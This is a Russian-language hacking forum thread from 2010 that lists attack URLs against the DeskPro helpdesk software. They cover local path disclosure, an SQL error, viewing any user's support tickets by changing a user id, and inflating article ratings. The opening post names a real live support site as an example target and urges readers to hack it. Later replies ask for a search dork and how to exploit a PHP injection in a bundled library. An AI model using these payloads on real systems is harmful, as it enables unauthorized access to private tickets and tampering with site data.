[ Обзор уязвимостей DeskPro ]

Discussion in 'Веб-уязвимости' started by banned, 5 Oct 2010.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Открытие локального пути

    Code:
    https://site.com/email/backup.php
    Code:
    https://site.com/email/checks.php
    SQL Error & Открытие локального пути

    Code:
    https://site.com/feeds/rss_tickets.php?user=8&type=[B]replyg[/B]
    Просмотр петиций любого пользователя

    Code:
    https://site.com/feeds/rss_tickets.php?user=22&type=[B]replyu[/B]
    Увеличение рейтинга любой статьи на N

    Code:
    https://site.com/kb_rate.php?ref=TICKET_NUMBER&howhelpful=9999999
    Пример: support.4game.ru, хекайте
     
    #1 banned, 5 Oct 2010
    Last edited: 5 Oct 2010
    3 people like this.
  2. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Дорк еще не помешал бы, для поиска этого двига.
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    deskpro.com
    google.com -> q -> deskpro
     
    1 person likes this.
  4. Soul Linker

    Soul Linker New Member

    Joined:
    5 Sep 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    UP. Тема актуальна.. кто нибудь нашел как можно использовать php-inj в DeskPRO/includes/3rdparty/html2text/html2text.php ?